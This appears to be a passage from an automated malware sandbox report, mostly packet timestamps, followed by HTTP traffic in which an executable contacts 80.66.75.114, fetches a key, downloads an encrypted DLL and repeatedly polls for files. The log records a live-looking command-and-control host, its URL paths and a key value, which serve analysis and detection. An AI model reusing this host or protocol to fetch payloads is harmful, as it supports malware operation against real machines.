                                                Oct 8, 2024 04:24:40.068511009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068516970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068562984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068562984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068605900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068612099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068651915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068658113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068697929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068703890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068748951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069103956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069147110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069164991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069210052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069252014 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069271088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069309950 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069315910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069354057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069366932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069406033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069430113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069469929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069492102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069533110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069536924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069576979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069581985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069614887 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069649935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069689989 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069710016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069750071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069756031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069801092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069802046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069843054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069865942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069905996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069915056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069955111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.069956064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.069996119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070018053 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070059061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070067883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070103884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070126057 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070163965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070187092 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070226908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070246935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070286989 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070307016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070343971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070368052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070415974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070430040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070471048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070477962 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070518017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070538998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070583105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070600986 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070642948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070662022 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070708036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070723057 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070769072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070771933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070815086 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070817947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070857048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070882082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070945024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.070971966 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070986032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.070991993 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071047068 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071053982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071099997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071144104 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071175098 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071175098 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071185112 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071194887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071237087 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071242094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071286917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071327925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071371078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071441889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071441889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071441889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071448088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071485996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071494102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071540117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071551085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071583033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071584940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071629047 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071630955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071669102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071676970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071717978 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071722031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071763039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071768045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071811914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071815014 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071856022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071862936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071907997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.071913958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.071954012 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072004080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072025061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072053909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072060108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072105885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072144985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072151899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072197914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072235107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072242975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072253942 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072283030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072297096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072341919 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072365999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072376013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072386980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072431087 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072433949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072474003 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072477102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072521925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072568893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072573900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072573900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072614908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072659969 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072662115 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072705984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072740078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072750092 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072756052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072796106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072837114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072839975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072885036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072927952 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.072941065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072941065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.072972059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073016882 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073018074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073062897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073086977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073108912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073148012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073162079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073210001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073214054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073251963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073255062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073306084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.073313951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.073359013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157138109 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157201052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157246113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157247066 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157290936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157351971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157411098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157449961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157449961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157470942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157504082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157521009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157531977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157577038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157618999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157620907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157665968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157706976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157708883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157747984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157753944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157798052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157840967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157844067 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157886982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157928944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157934904 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.157975912 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.157980919 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158026934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158070087 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158071041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158119917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158159018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158159971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158200979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158564091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158691883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158730984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158734083 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158780098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158817053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158823967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158860922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158869028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158915043 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.158956051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.158974886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159034967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159075975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159080029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159121037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159125090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159169912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159214973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159215927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159317017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.159359932 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.159363031 CEST804973880.66.75.114192.168.2.6
                                                • 80.66.75.114
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.6 | 49738 | 80.66.75.114 | 80 | 3212 | C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 04:24:09.736298084 CEST | 384 | OUT | GET /name HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:10.460727930 CEST | 210 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 7
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 6d 69 78 6e 69 6e 65
                                                Data Ascii: mixnine
                                                Oct 8, 2024 04:24:10.502087116 CEST | 416 | OUT | GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:10.739790916 CEST | 203 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:10.746113062 CEST | 387 | OUT | GET /dll/key HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:10.963947058 CEST | 224 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 21
                                                Keep-Alive: timeout=5, max=98
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                Oct 8, 2024 04:24:10.969579935 CEST 392 OUT GET /dll/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:11.194689035 CEST 1236 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:11 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                Content-Length: 97296
                                                Keep-Alive: timeout=5, max=97
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Oct 8, 2024 04:24:11.481280088 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:11.708328009 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:11 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=96
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:13.850475073 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:14.076299906 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:13 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=95
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:16.100605011 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:16.322865963 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:16 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=94
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:18.334892035 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:18.559938908 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:18 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=93
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:20.585094929 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:20.809391022 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:20 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=92
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:22.835894108 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:23.061348915 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:22 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=91
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:25.084901094 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
